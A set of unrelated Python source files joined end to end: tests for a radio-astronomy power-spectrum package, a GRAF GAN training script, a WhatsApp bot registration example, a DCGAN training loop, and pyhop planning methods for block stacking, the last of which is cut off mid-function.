            assert np.isclose(Wv.imag, 0, atol=1e-6).all()
def test_get_argparser():
    """Check that the pspec_run argparser parses '~'-delimited pair options."""
    parser = pspecdata.get_pspec_run_argparser()
    argv = [['foo'], 'bar',
            '--dset_pairs', '0~0,1~1',
            '--pol_pairs', 'xx~xx,yy~yy',
            '--spw_ranges', '300~400, 600~800',
            '--blpairs', '24~25~24~25, 37~38~37~38']
    parsed = parser.parse_args(argv)
    assert parsed.pol_pairs == [('xx', 'xx'), ('yy', 'yy')]
    assert parsed.dset_pairs == [(0, 0), (1, 1)]
    assert parsed.spw_ranges == [(300, 400), (600, 800)]
    assert parsed.blpairs == [((24, 25), (24, 25)), ((37, 38), (37, 38))]
def test_get_argparser_backwards_compatibility():
    """Check that the legacy space-delimited pair syntax still parses."""
    parser = pspecdata.get_pspec_run_argparser()
    argv = [['foo'], 'bar',
            '--dset_pairs', '0 0, 1 1',
            '--pol_pairs', 'xx xx, yy yy',
            '--spw_ranges', '300 400, 600 800',
            '--blpairs', '24 25 24 25, 37 38 37 38']
    parsed = parser.parse_args(argv)
    assert parsed.pol_pairs == [('xx', 'xx'), ('yy', 'yy')]
    assert parsed.dset_pairs == [(0, 0), (1, 1)]
    assert parsed.spw_ranges == [(300, 400), (600, 800)]
    assert parsed.blpairs == [((24, 25), (24, 25)), ((37, 38), (37, 38))]
"""
# LEGACY MONTE CARLO TESTS
def validate_get_G(self,tolerance=0.2,NDRAWS=100,NCHAN=8):
'''
Test get_G where we interpret G in this case to be the Fisher Matrix.
Args:
tolerance, required max fractional difference from analytical
solution to pass.
NDRAWS, number of random data sets to sample frome.
NCHAN, number of channels. Must be less than test data sets.
'''
#read in data.
dpath=os.path.join(DATA_PATH,'zen.2458042.12552.xx.HH.uvXAA')
data=uv.UVData()
wghts=uv.UVData()
data.read_miriad(dpath)
wghts.read_miriad(dpath)
assert(NCHAN<data.Nfreqs)
#make sure we use fewer channels.
data.select(freq_chans=range(NCHAN))
wghts.select(freq_chans=range(NCHAN))
#********************************************************************
#set data to random white noise with a random variance and mean.
##!!!Set mean to zero for now since analyitic solutions assumed mean
##!!!Subtracted data which oqe isn't actually doing.
#*******************************************************************
test_mean=0.*np.abs(np.random.randn())
test_std=np.abs(np.random.randn())
#*******************************************************************
#Make sure that all of the flags are set too true for analytic case.
#*******************************************************************
data.flag_array[:]=False
wghts.data_array[:]=1.
wghts.flag_array[:]=False
bllist=data.get_antpairs()
#*******************************************************************
#These are the averaged "fisher matrices"
#*******************************************************************
f_mat=np.zeros((data.Nfreqs,data.Nfreqs),dtype=complex)
f_mat_true=np.zeros((data.Nfreqs,data.Nfreqs),dtype=complex)
nsamples=0
for datanum in range(NDATA):
#for each data draw, generate a random data set.
pspec=pspecdata.PSpecData()
data.data_array=test_std\
*np.random.standard_normal(size=data.data_array.shape)\
/np.sqrt(2.)+1j*test_std\
*np.random.standard_normal(size=data.data_array.shape)\
/np.sqrt(2.)+(1.+1j)*test_mean
pspec.add([data],[wghts])
#get empirical Fisher matrix for baselines 0 and 1.
pair1=bllist[0]
pair2=bllist[1]
k1=(0,pair1[0],pair1[1],-5)
k2=(0,pair2[0],pair2[1],-5)
#add to fisher averages.
f_mat_true=f_mat_true+pspec.get_F(k1,k2,true_fisher=True)
f_mat=f_mat+pspec.get_F(k1,k2)
#test identity
self.assertTrue(np.allclose(pspec.get_F(k1,k2,use_identity=True)/data.Nfreqs**2.,
np.identity(data.Nfreqs).astype(complex)))
del pspec
#divide out empirical Fisher matrices by analytic solutions.
f_mat=f_mat/NDATA/data.Nfreqs**2.*test_std**4.
f_mat_true=f_mat_true/NDATA/data.Nfreqs**2.*test_std**4.
#test equality to analytic solutions
self.assertTrue(np.allclose(f_mat,
np.identity(data.Nfreqs).astype(complex),
rtol=tolerance,
atol=tolerance)
self.assertTrue(np.allclose(f_mat_true,
np.identity(data.Nfreqs).astype(complex),
rtol=tolerance,
atol=tolerance)
#TODO: Need a test case for some kind of taper.
def validate_get_MW(self,NCHANS=20):
'''
Test get_MW with analytical case.
Args:
NCHANS, number of channels to validate.
'''
###
test_std=np.abs(np.random.randn())
f_mat=np.identity(NCHANS).astype(complex)/test_std**4.*nchans**2.
pspec=pspecdata.PSpecData()
m,w=pspec.get_MW(f_mat,mode='G^-1')
#test M/W matrices are close to analytic solutions
#check that rows in W sum to unity.
self.assertTrue(np.all(np.abs(w.sum(axis=1)-1.)<=tolerance))
#check that W is analytic soluton (identity)
self.assertTrue(np.allclose(w,np.identity(nchans).astype(complex)))
#check that M.F = W
self.assertTrue(np.allclose(np.dot(m,f_mat),w))
m,w=pspec.get_MW(f_mat,mode='G^-1/2')
#check W is identity
self.assertTrue(np.allclose(w,np.identity(nchans).astype(complex)))
self.assertTrue(np.allclose(np.dot(m,f_mat),w))
#check that L^-1 runs.
m,w=pspec.get_MW(f_mat,mode='G^-1')
def validate_q_hat(self,NCHAN=8,NDATA=1000,):
'''
validate q_hat calculation by drawing random white noise data sets
'''
dpath=os.path.join(DATA_PATH,'zen.2458042.12552.xx.HH.uvXAA')
data=uv.UVData()
wghts=uv.UVData()
data.read_miriad(dpath)
wghts.read_miriad(dpath)
assert(NCHAN<=data.Nfreqs)
data.select(freq_chans=range(NCHAN))
wghts.select(freq_chans=range(NCHAN))
#***************************************************************
#set data to random white noise with a random variance and mean
#q_hat does not subtract a mean so I will set it to zero for
#the test.
#****************************************************************
test_mean=0.*np.abs(np.random.randn())#*np.abs(np.random.randn())
test_std=np.abs(np.random.randn())
data.flag_array[:]=False#Make sure that all of the flags are set too true for analytic case.
wghts.data_array[:]=1.
wghts.flag_array[:]=False
bllist=data.get_antpairs()
q_hat=np.zeros(NCHAN).astype(complex)
q_hat_id=np.zeros_like(q_hat)
q_hat_fft=np.zeros_like(q_hat)
nsamples=0
for datanum in range(NDATA):
pspec=pspecdata.PSpecData()
data.data_array=test_std*np.random.standard_normal(size=data.data_array.shape)/np.sqrt(2.)\
+1j*test_std*np.random.standard_normal(size=data.data_array.shape)/np.sqrt(2.)+(1.+1j)*test_mean
pspec.add([data],[wghts])
for j in range(data.Nbls):
#get baseline index
pair1=bllist[j]
k1=(0,pair1[0],pair1[1],-5)
k2=(0,pair1[0],pair1[1],-5)
#get q
#test identity
q_hat=q_hat+np.mean(pspec.q_hat(k1,k2,use_fft=False),
axis=1)
q_hat_id=q_hat_id+np.mean(pspec.q_hat(k1,k2,use_identity=True),
axis=1)
q_hat_fft=q_hat_fft+np.mean(pspec.q_hat(k1,k2),axis=1)
nsamples=nsamples+1
del pspec
#print nsamples
nfactor=test_std**2./data.Nfreqs/nsamples
q_hat=q_hat*nfactor
q_hat_id=q_hat_id*nfactor/test_std**4.
q_hat_fft=q_hat_fft*nfactor
#print q_hat
#print q_hat_id
#print q_hat_fft
self.assertTrue(np.allclose(q_hat,
np.identity(data.Nfreqs).astype(complex)))
self.assertTrue(np.allclose(q_hat_id,
np.identity(data.Nfreqs).astype(complex)))
self.assertTrue(np.allclose(q_hat_fft,
np.identity(data.Nfreqs).astype(complex)))
"""
# Run the full test suite when this module is executed directly.
if __name__ == "__main__":
unittest.main()
|
11520504
|
import argparse
import os
from os import path
import time
import copy
import torch
torch.set_default_tensor_type('torch.cuda.FloatTensor')
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
import matplotlib
matplotlib.use('Agg')
import sys
sys.path.append('submodules') # needed to make imports work in GAN_stability
from graf.gan_training import Trainer, Evaluator
from graf.config import get_data, build_models, save_config, update_config, build_lr_scheduler
from graf.utils import count_trainable_parameters, get_nsamples
from graf.transforms import ImgToPatch
from GAN_stability.gan_training import utils
from GAN_stability.gan_training.train import update_average
from GAN_stability.gan_training.logger import Logger
from GAN_stability.gan_training.checkpoints import CheckpointIO
from GAN_stability.gan_training.distributions import get_ydist, get_zdist
from GAN_stability.gan_training.config import (
load_config, build_optimizers,
)
if __name__ == '__main__':
    # GRAF GAN training entry point: parses the config, builds dataset/models,
    # restores any checkpoint, then runs the adversarial training loop with
    # periodic sampling, FID/KID evaluation, video rendering and checkpointing.
    # Arguments
    parser = argparse.ArgumentParser(
        description='Train a GAN with different regularization strategies.'
    )
    parser.add_argument('config', type=str, help='Path to config file.')
    # parse_known_args: unrecognized CLI tokens are treated as config overrides below
    args, unknown = parser.parse_known_args()
    config = load_config(args.config, 'configs/default.yaml')
    config['data']['fov'] = float(config['data']['fov'])
    config = update_config(config, unknown)
    # Short hands
    batch_size = config['training']['batch_size']
    restart_every = config['training']['restart_every']
    fid_every = config['training']['fid_every']
    save_every = config['training']['save_every']
    backup_every = config['training']['backup_every']
    save_best = config['training']['save_best']
    assert save_best=='fid' or save_best=='kid', 'Invalid save best metric!'
    out_dir = os.path.join(config['training']['outdir'], config['expname'])
    checkpoint_dir = path.join(out_dir, 'chkpts')
    # Create missing directories
    if not path.exists(out_dir):
        os.makedirs(out_dir)
    if not path.exists(checkpoint_dir):
        os.makedirs(checkpoint_dir)
    # Save config file
    save_config(os.path.join(out_dir, 'config.yaml'), config)
    # Logger
    checkpoint_io = CheckpointIO(
        checkpoint_dir=checkpoint_dir
    )
    device = torch.device("cuda:0")
    # Dataset
    train_dataset, hwfr, render_poses = get_data(config)
    # in case of orthographic projection replace focal length by far-near
    if config['data']['orthographic']:
        hw_ortho = (config['data']['far']-config['data']['near'], config['data']['far']-config['data']['near'])
        hwfr[2] = hw_ortho
    config['data']['hwfr'] = hwfr # add for building generator
    print(train_dataset, hwfr, render_poses.shape)
    train_loader = torch.utils.data.DataLoader(
        train_dataset,
        batch_size=batch_size,
        num_workers=config['training']['nworkers'],
        shuffle=True, pin_memory=True, sampler=None, drop_last=True
    )
    # NOTE(review): validation reuses the training data/loader verbatim here.
    val_dataset = train_dataset
    val_loader = train_loader
    hwfr_val = hwfr
    # Create models
    generator, discriminator = build_models(config)
    print('Generator params: %d' % count_trainable_parameters(generator))
    print('Discriminator params: %d, channels: %d' % (count_trainable_parameters(discriminator), discriminator.nc))
    print(generator.render_kwargs_train['network_fn'])
    print(discriminator)
    # Put models on gpu if needed
    generator = generator.to(device)
    discriminator = discriminator.to(device)
    g_optimizer, d_optimizer = build_optimizers(
        generator, discriminator, config
    )
    # input transform
    img_to_patch = ImgToPatch(generator.ray_sampler, hwfr[:3])
    # Register modules to checkpoint
    checkpoint_io.register_modules(
        discriminator=discriminator,
        g_optimizer=g_optimizer,
        d_optimizer=d_optimizer,
        **generator.module_dict # treat NeRF specially
    )
    # Get model file
    model_file = config['training']['model_file']
    stats_file = 'stats.p'
    # Logger
    logger = Logger(
        log_dir=path.join(out_dir, 'logs'),
        img_dir=path.join(out_dir, 'imgs'),
        monitoring=config['training']['monitoring'],
        monitoring_dir=path.join(out_dir, 'monitoring')
    )
    # Distributions
    ydist = get_ydist(1, device=device) # Dummy to keep GAN training structure in tact
    y = torch.zeros(batch_size) # Dummy to keep GAN training structure in tact
    zdist = get_zdist(config['z_dist']['type'], config['z_dist']['dim'],
                      device=device)
    # Save for tests
    n_test_samples_with_same_shape_code = config['training']['n_test_samples_with_same_shape_code']
    ntest = batch_size
    x_real = get_nsamples(train_loader, ntest)
    ytest = torch.zeros(ntest)
    ztest = zdist.sample((ntest,))
    ptest = torch.stack([generator.sample_pose() for i in range(ntest)])
    if n_test_samples_with_same_shape_code > 0:
        # Replicate each test sample so several appearances share one shape code.
        ntest *= n_test_samples_with_same_shape_code
        ytest = ytest.repeat(n_test_samples_with_same_shape_code)
        ptest = ptest.unsqueeze_(1).expand(-1, n_test_samples_with_same_shape_code, -1, -1).flatten(0, 1) # (ntest x n_same_shape) x 3 x 4
        zdim_shape = config['z_dist']['dim'] - config['z_dist']['dim_appearance']
        # repeat shape code
        zshape = ztest[:, :zdim_shape].unsqueeze(1).expand(-1, n_test_samples_with_same_shape_code, -1).flatten(0, 1)
        zappearance = zdist.sample((ntest,))[:, zdim_shape:]
        ztest = torch.cat([zshape, zappearance], dim=1)
    utils.save_images(x_real, path.join(out_dir, 'real.png'))
    # Test generator
    if config['training']['take_model_average']:
        generator_test = copy.deepcopy(generator)
        # we have to change the pointers of the parameter function in nerf manually
        generator_test.parameters = lambda: generator_test._parameters
        generator_test.named_parameters = lambda: generator_test._named_parameters
        checkpoint_io.register_modules(**{k+'_test': v for k, v in generator_test.module_dict.items()})
    else:
        generator_test = generator
    # Evaluator
    evaluator = Evaluator(fid_every > 0, generator_test, zdist, ydist,
                          batch_size=batch_size, device=device, inception_nsamples=33)
    # Initialize fid+kid evaluator
    if fid_every > 0:
        fid_cache_file = os.path.join(out_dir, 'fid_cache_train.npz')
        kid_cache_file = os.path.join(out_dir, 'kid_cache_train.npz')
        evaluator.inception_eval.initialize_target(val_loader, cache_file=fid_cache_file, act_cache_file=kid_cache_file)
    # Train
    tstart = t0 = time.time()
    # Load checkpoint if it exists
    try:
        load_dict = checkpoint_io.load(model_file)
    except FileNotFoundError:
        it = epoch_idx = -1
        fid_best = float('inf')
        kid_best = float('inf')
    else:
        it = load_dict.get('it', -1)
        epoch_idx = load_dict.get('epoch_idx', -1)
        fid_best = load_dict.get('fid_best', float('inf'))
        kid_best = load_dict.get('kid_best', float('inf'))
        logger.load_stats(stats_file)
    # Reinitialize model average if needed
    if (config['training']['take_model_average']
            and config['training']['model_average_reinit']):
        update_average(generator_test, generator, 0.)
    # Learning rate anneling
    d_lr = d_optimizer.param_groups[0]['lr']
    g_lr = g_optimizer.param_groups[0]['lr']
    g_scheduler = build_lr_scheduler(g_optimizer, config, last_epoch=it)
    d_scheduler = build_lr_scheduler(d_optimizer, config, last_epoch=it)
    # ensure lr is not decreased again
    d_optimizer.param_groups[0]['lr'] = d_lr
    g_optimizer.param_groups[0]['lr'] = g_lr
    # Trainer
    trainer = Trainer(
        generator, discriminator, g_optimizer, d_optimizer,
        use_amp=config['training']['use_amp'],
        gan_type=config['training']['gan_type'],
        reg_type=config['training']['reg_type'],
        reg_param=config['training']['reg_param']
    )
    print('it {}: start with LR:\n\td_lr: {}\tg_lr: {}'.format(it, d_optimizer.param_groups[0]['lr'], g_optimizer.param_groups[0]['lr']))
    # Training loop
    print('Start training...')
    # Runs until killed externally or until restart_every triggers exit(3) below.
    while True:
        epoch_idx += 1
        print('Start epoch %d...' % epoch_idx)
        for x_real in train_loader:
            t_it = time.time()
            it += 1
            generator.ray_sampler.iterations = it # for scale annealing
            # Sample patches for real data
            rgbs = img_to_patch(x_real.to(device)) # N_samples x C
            # Discriminator updates
            z = zdist.sample((batch_size,))
            dloss, reg = trainer.discriminator_trainstep(rgbs, y=y, z=z)
            logger.add('losses', 'discriminator', dloss, it=it)
            logger.add('losses', 'regularizer', reg, it=it)
            # Generators updates
            if config['nerf']['decrease_noise']:
                generator.decrease_nerf_noise(it)
            z = zdist.sample((batch_size,))
            gloss = trainer.generator_trainstep(y=y, z=z)
            logger.add('losses', 'generator', gloss, it=it)
            if config['training']['take_model_average']:
                update_average(generator_test, generator,
                               beta=config['training']['model_average_beta'])
            # Update learning rate
            g_scheduler.step()
            d_scheduler.step()
            d_lr = d_optimizer.param_groups[0]['lr']
            g_lr = g_optimizer.param_groups[0]['lr']
            logger.add('learning_rates', 'discriminator', d_lr, it=it)
            logger.add('learning_rates', 'generator', g_lr, it=it)
            dt = time.time() - t_it
            # Print stats
            if ((it + 1) % config['training']['print_every']) == 0:
                g_loss_last = logger.get_last('losses', 'generator')
                d_loss_last = logger.get_last('losses', 'discriminator')
                d_reg_last = logger.get_last('losses', 'regularizer')
                print('[%s epoch %0d, it %4d, t %0.3f] g_loss = %.4f, d_loss = %.4f, reg=%.4f'
                      % (config['expname'], epoch_idx, it + 1, dt, g_loss_last, d_loss_last, d_reg_last))
            # (ii) Sample if necessary
            if ((it % config['training']['sample_every']) == 0) or ((it < 500) and (it % 100 == 0)):
                rgb, depth, acc = evaluator.create_samples(ztest.to(device), poses=ptest)
                logger.add_imgs(rgb, 'rgb', it)
                logger.add_imgs(depth, 'depth', it)
                logger.add_imgs(acc, 'acc', it)
            # (v) Compute fid if necessary
            if fid_every > 0 and ((it + 1) % fid_every) == 0:
                fid, kid = evaluator.compute_fid_kid()
                logger.add('validation', 'fid', fid, it=it)
                logger.add('validation', 'kid', kid, it=it)
                torch.cuda.empty_cache()
                # save best model
                if save_best=='fid' and fid < fid_best:
                    fid_best = fid
                    print('Saving best model...')
                    checkpoint_io.save('model_best.pt', it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
                    logger.save_stats('stats_best.p')
                    torch.cuda.empty_cache()
                elif save_best=='kid' and kid < kid_best:
                    kid_best = kid
                    print('Saving best model...')
                    checkpoint_io.save('model_best.pt', it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
                    logger.save_stats('stats_best.p')
                    torch.cuda.empty_cache()
            # (vi) Create video if necessary
            if ((it+1) % config['training']['video_every']) == 0:
                N_samples = 4
                zvid = zdist.sample((N_samples,))
                basename = os.path.join(out_dir, '{}_{:06d}_'.format(os.path.basename(config['expname']), it))
                evaluator.make_video(basename, zvid, render_poses, as_gif=False)
            # (i) Backup if necessary
            if ((it + 1) % backup_every) == 0:
                print('Saving backup...')
                checkpoint_io.save('model_%08d.pt' % it, it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
                logger.save_stats('stats_%08d.p' % it)
            # (vi) Save checkpoint if necessary
            if time.time() - t0 > save_every:
                print('Saving checkpoint...')
                checkpoint_io.save(model_file, it=it, epoch_idx=epoch_idx, fid_best=fid_best, kid_best=kid_best)
                logger.save_stats('stats.p')
                t0 = time.time()
                # Exit code 3 presumably tells an outer job scheduler to
                # relaunch the run after restart_every seconds — TODO confirm.
                if (restart_every > 0 and t0 - tstart > restart_every):
                    exit(3)
|
11520515
|
from aiohttp import web
from waio import Bot, Dispatcher
from waio.states import StatesGroup, BaseState, FSMContext
from waio.types import Message
from waio.logs import loguru_filter
from waio.storage import RedisStorage
# Enable verbose framework logging.
loguru_filter.set_level('DEBUG')
# Gupshup/WhatsApp bot credentials (placeholders in this example).
bot = Bot(
    apikey='API_KEY',
    src_name='SRC_NAME',
    phone_number=79281112233
)
# Redis-backed finite-state-machine storage for per-user conversation state.
storage = RedisStorage(prefix_fsm='fsm', redis_url="redis://localhost:6379")
dp = Dispatcher(bot=bot, storage=storage)
class RegisterStates(StatesGroup):
    """FSM states for the two-step registration dialog."""

    birthday = BaseState()  # waiting for the user's date of birth
    email = BaseState()     # waiting for the user's e-mail address
@dp.message_handler(commands=['register'], state='*')
async def register_name(message: Message, state: FSMContext):
    """Start registration: greet the user and ask for a date of birth."""
    await message.answer(f'Hi, {message.sender_name}! send your date of birth')
    await state.set_state(RegisterStates.birthday)
@dp.message_handler(state=RegisterStates.birthday)
async def register_age(message: Message, state: FSMContext):
    """Store the birthday reply and advance the FSM to the e-mail step."""
    await state.set_data(birthday=message.text)
    await message.answer(f'Thanks for sending you birthday!\n'
                         f'Send you email address')
    await state.set_state(RegisterStates.email)
@dp.message_handler(state=RegisterStates.email)
async def register_email(message: Message, state: FSMContext):
    """Final step: store the e-mail, echo a summary, and finish the dialog.

    Renamed from a duplicate ``register_age`` definition — the original file
    declared two handlers with the same function name, which shadowed the
    birthday handler's name at module level.
    """
    await state.set_data(email=message.text)
    # Fetch only the two keys we collected during this dialog.
    state_data_certain = await state.get_data("email", "birthday")
    # Alternative for get all data:
    # await state.get_data()
    await message.answer(f'Register completed...\n\n'
                         f'Your name: {message.sender_name}\n'
                         f'Your email: {state_data_certain["email"]}\n'
                         f'Your birthday: {state_data_certain["birthday"]}\n')
    # Leave the FSM and drop the stored registration data.
    await state.finish(clear_data=True)
async def handler_gupshup(request):
    """Webhook endpoint: hand an incoming Gupshup event to the dispatcher."""
    payload = await request.json()
    await dp.handle_event(payload)
    # Always acknowledge receipt so the provider does not retry.
    return web.Response(status=200)
# Run the webhook server that receives Gupshup callbacks.
if __name__ == "__main__":
    webhook = web.Application()
    webhook.add_routes([web.post('/api/v1/gupshup/hook', handler_gupshup)])
    web.run_app(webhook, port=8017)
|
11520521
|
import os
import time
import fnmatch
from random import shuffle
import numpy as np
import tensorflow as tf
from image_ops import get_image, save_images
def generate_z(sample_size, z_dim):
    """Draw a batch of noise vectors from U(-1, 1).

    Swap this out to experiment with different noise distributions.

    Args:
        sample_size: sample/batch size.
        z_dim: dimensionality of each noise vector.

    Returns:
        float32 array of shape (sample_size, z_dim).
    """
    noise = np.random.uniform(low=-1, high=1, size=(sample_size, z_dim))
    return noise.astype(np.float32)
def train(dcgan):
    """Train DCGAN.

    Python 2 code (print statements, xrange). Builds the image list,
    sets up Adam optimizers and summaries, then alternates one D update
    with two G updates per batch, sampling and checkpointing periodically.

    Preconditions:
        checkpoint, data, logs directories exist
    Postconditions:
        checkpoints are saved
        logs are written
    Args:
        dcgan: DCGAN object
    """
    sess = dcgan.sess
    FLAGS = dcgan.f
    # load dataset
    list_file = os.path.join(FLAGS.data_dir, '{0}.txt'.format(FLAGS.dataset))
    if os.path.exists(list_file):
        # load from file when found
        print "Using training list: {0}".format(list_file)
        with open(list_file, 'r') as f:
            data = [os.path.join(FLAGS.data_dir,
                FLAGS.dataset, l.strip()) for l in f]
    else:
        # recursively walk dataset directory to get images
        data = []
        dataset_dir = os.path.join(FLAGS.data_dir, FLAGS.dataset)
        for root, dirnames, filenames in os.walk(dataset_dir):
            for filename in fnmatch.filter(filenames, '*.{0}'.format(FLAGS.image_ext)):
                data.append(os.path.join(root, filename))
        shuffle(data)
        # save to file for next time
        with open(list_file, 'w') as f:
            for l in data:
                line = l.replace(dataset_dir + os.sep, '')
                f.write('{0}\n'.format(line))
    assert len(data) > 0, "found 0 training data"
    print "Found {0} training images.".format(len(data))
    # set up Adam optimizers
    d_optim = tf.train.AdamOptimizer(
        FLAGS.learning_rate,
        beta1=FLAGS.beta1
    ).minimize(dcgan.d_loss, var_list=dcgan.d_vars)
    g_optim = tf.train.AdamOptimizer(
        FLAGS.learning_rate,
        beta1=FLAGS.beta1
    ).minimize(dcgan.g_loss, var_list=dcgan.g_vars)
    tf.global_variables_initializer().run()
    # summaries
    g_sum = tf.summary.merge([dcgan.z_sum, dcgan.d_fake_sum,
        dcgan.g_sum, dcgan.d_loss_fake_sum, dcgan.g_loss_sum])
    d_sum = tf.summary.merge([dcgan.z_sum, dcgan.d_real_sum,
        dcgan.real_sum, dcgan.d_loss_real_sum, dcgan.d_loss_sum])
    writer = tf.summary.FileWriter(os.path.join(FLAGS.log_dir,
        dcgan.get_model_dir()), sess.graph)
    # training images for sampling
    sample_files = data[0:FLAGS.sample_size]
    sample = [get_image(sample_file,
        FLAGS.output_size) for sample_file in sample_files]
    sample_images = np.array(sample).astype(np.float32)
    sample_path = os.path.join('./', FLAGS.sample_dir,
                               dcgan.get_model_dir(),
                               'real_samples.png')
    save_images(sample_images, sample_path)
    # z for sampling
    sample_z = generate_z(FLAGS.sample_size, FLAGS.z_dim)
    # run for number of epochs
    counter = 1
    start_time = time.time()
    for epoch in xrange(FLAGS.epoch):
        num_batches = int(len(data) / FLAGS.batch_size)
        # training iterations
        for batch_index in xrange(0, num_batches):
            # get batch of images for training
            batch_start = batch_index*FLAGS.batch_size
            batch_end = (batch_index+1)*FLAGS.batch_size
            batch_files = data[batch_start:batch_end]
            batch_images = [get_image(batch_file,
                FLAGS.output_size) for batch_file in batch_files]
            # create batch of random z vectors for training
            batch_z = generate_z(FLAGS.batch_size, FLAGS.z_dim)
            # update D network
            _, summary_str = sess.run([d_optim, d_sum],
                feed_dict={dcgan.real_images: batch_images, dcgan.z: batch_z})
            writer.add_summary(summary_str, counter)
            # update G network
            _, summary_str = sess.run([g_optim, g_sum],
                feed_dict={dcgan.z: batch_z})
            writer.add_summary(summary_str, counter)
            # update G network again for stability
            _, summary_str = sess.run([g_optim, g_sum],
                feed_dict={dcgan.z: batch_z})
            writer.add_summary(summary_str, counter)
            # compute errors
            errD_fake = dcgan.d_loss_fake.eval({dcgan.z: batch_z})
            errD_real = dcgan.d_loss_real.eval({dcgan.real_images: batch_images})
            errG = dcgan.g_loss.eval({dcgan.z: batch_z})
            # increment global counter (for saving models)
            counter += 1
            # print stats
            print "[train] epoch: {0}, iter: {1}/{2}, time: {3}, d_loss: {4}, g_loss: {5}".format(
                epoch, batch_index, num_batches, time.time() - start_time, errD_fake+errD_real, errG)
            # sample every 100 iterations
            if np.mod(counter, 100) == 1:
                samples, d_loss, g_loss = dcgan.sess.run(
                    [dcgan.G, dcgan.d_loss, dcgan.g_loss],
                    feed_dict={dcgan.z: sample_z,
                               dcgan.real_images: sample_images})
                print "[sample] time: {0}, d_loss: {1}, g_loss: {2}".format(
                    time.time() - start_time, d_loss, g_loss)
                # save samples for visualization
                sample_path = os.path.join('./', FLAGS.sample_dir,
                                           dcgan.get_model_dir(),
                                           'train_{0:02d}_{1:04d}.png'.format(epoch, batch_index))
                save_images(samples, sample_path)
            # save model every 500 iterations
            if np.mod(counter, 500) == 2:
                dcgan.save(counter)
                print "[checkpoint] saved: {0}".format(time.time() - start_time)
    # save final model
    dcgan.save(counter)
    print "[checkpoint] saved: {0}".format(time.time() - start_time)
|
11520553
|
from midca.modules._plan import modified_pyhop
import time
def point_at_m(state, objectID):
    """Decompose 'point_at': wait until the object is seen, then point to it."""
    subtasks = [("block_until_seen", objectID)]
    subtasks.append(("point_to", objectID))
    return subtasks
def pickup_m(state, objectID):
    """Decompose 'pickup_task' into reach, grab and raise primitives."""
    return [
        ("reach_to_pickup", objectID),
        ("grab", objectID),
        ("raising", objectID),
    ]
def unstack_m(state, b1):
    """Decompose 'unstack_task': reach to b1 on its current support, grab, raise."""
    support = get_last_position(state, b1)
    return [("reach_to_unstack", b1, support), ("grab", b1), ("raising", b1)]
def get_last_position(state, objectOrID):
    """Return the most recently observed (truthy) position of the object.

    Scans the state's position history newest-first; returns None when the
    history is empty or no record carries a position.
    """
    history = state.all_pos(objectOrID)
    if history:
        for record in reversed(history):
            if record.position:
                return record.position
    return None
def get_last_clear_status(state, objectOrID):
    """Return the most recent (truthy) clear/not-clear flag for the object.

    Mirrors get_last_position but reads the ``isclear`` field of the newest
    history record that has one; None when unknown.
    """
    history = state.all_pos(objectOrID)
    if history:
        for record in reversed(history):
            if record.isclear:
                return record.isclear
    return None
def get_top_status(state, objectOrID):
    """Return the block resting directly on objectOrID, or False if none."""
    for candidate in all_blocks(state):
        if get_last_position(state, candidate) == objectOrID:
            return candidate
    return False
def get_status_in_arm(state):
    """Return the block currently held by the arm, or False when the arm is empty."""
    for candidate in all_blocks(state):
        if get_last_position(state, candidate) == "in-arm":
            return candidate
    return False
def get_max_height_position_block(state, objectOrID):
    """Climb the stack above objectOrID and return its topmost (clear) block.

    Recurses through get_top_status until a block whose status is 'clear'
    is found. Debug prints are kept from the original implementation.
    """
    top = get_top_status(state, objectOrID)
    print("the object is ")
    print(objectOrID)
    print("the top status is ")
    print(top)
    if get_last_clear_status(state, objectOrID) == 'clear':
        print("Result is ")
        print("")
        print(objectOrID)
        return objectOrID
    return get_max_height_position_block(state, top)
def giveindirectobject(state, directobject):
    """Return the first goal block other than directobject, or False if none.

    Scans the known blocks and picks the first one that appears in the
    module-level goal-position table (goal_pos_dic) and is not the direct
    object itself. The original body had an unreachable ``break`` after
    the ``return``; it has been removed.
    """
    for each in all_blocks(state):
        if each in goal_pos_dic and each != directobject:
            return each
    return False
def all_blocks(state):
    """Return every object the planning state currently knows about."""
    return state.all_objects()
def achieve_goals_m(state, goals):
    """Top-level Pyhop method: decompose the first goal, then recurse on the rest.

    Dispatches on goal["objective"] ('show-loc', 'stacking', 'holding',
    'moving'); returns False for unknown objectives and [] when no goals
    remain. NOTE: the local name ``object`` shadows the builtin.
    """
    print("achieve_goals_m")
    if goals:
        g = goals
        goal = goals[0]
        # Record this goal's target position in the global goal_pos_dic.
        get_goal_pos(goal)
        object = goal["directObject"]
        print(("goal objective is " + goal["objective"] ))
        #print(object + " is " + get_last_clear_status(state, object))
        if goal["objective"] == "show-loc":
            return [("point_at", goal["directObject"]), ("achieve_goals", goals[1:])]
        if goal["objective"] == "stacking":
            print("holding")
            return [("move_blocks", goal), ("achieve_goals", goals[1:])]
        if goal["objective"] == "holding":
            '''
            print("STATUS")
            print(" last clear status of green block")
            print(get_last_clear_status(state, 'green block'))
            print(" last clear status of blue block")
            print(get_last_clear_status(state, 'blue block'))
            print(" last clear status of red block")
            print(get_last_clear_status(state, 'red block'))
            print("")
            print("")
            raw_input("status")
            print("")
            print("")
            print("------------------------------------------------------")
            print("Position")
            print(" last position of green block")
            print(get_last_position(state, 'green block'))
            print(" last position of blue block")
            print(get_last_position(state, 'blue block'))
            print(" last position of red block")
            print(get_last_position(state, 'red block'))
            print("")
            print("")
            raw_input("status")
            print("***********************************************************")
            print("in holding")
            print("the object is" )
            print(object)
            print("last clear status of object")
            print(get_last_clear_status(state, object))
            print("get last position of direct object")
            print(get_last_position(state, goal["directObject"]))
            print("get maximum height position")
            print("*******************************************************")
            print(get_max_height_position_block(state , object))
            print("")
            raw_input("enter")
            '''
            # Already holding the target: nothing to do for this goal.
            if get_last_position(state, goal["directObject"]) == 'in-arm':
                return [("achieve_goals", goals[1:])]
            if not get_status_in_arm(state):
                if get_last_clear_status(state, object) == 'clear':
                    return [("pickup_task", goal["directObject"]), ("achieve_goals", goals[1:])]
                else:
                    # Clear the stack above the target first, then retry this goal.
                    return [("move_one", get_max_height_position_block(state , object) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
            else:
                # Arm is busy: put the held block on the table, then retry.
                return [("move_one", get_status_in_arm(state) , 'table'),("achieve_goals", [goal]), ("achieve_goals", goals[1:])]
        if goal["objective"] == "moving":
            if get_last_position(state, goal["directObject"]) == 'table':
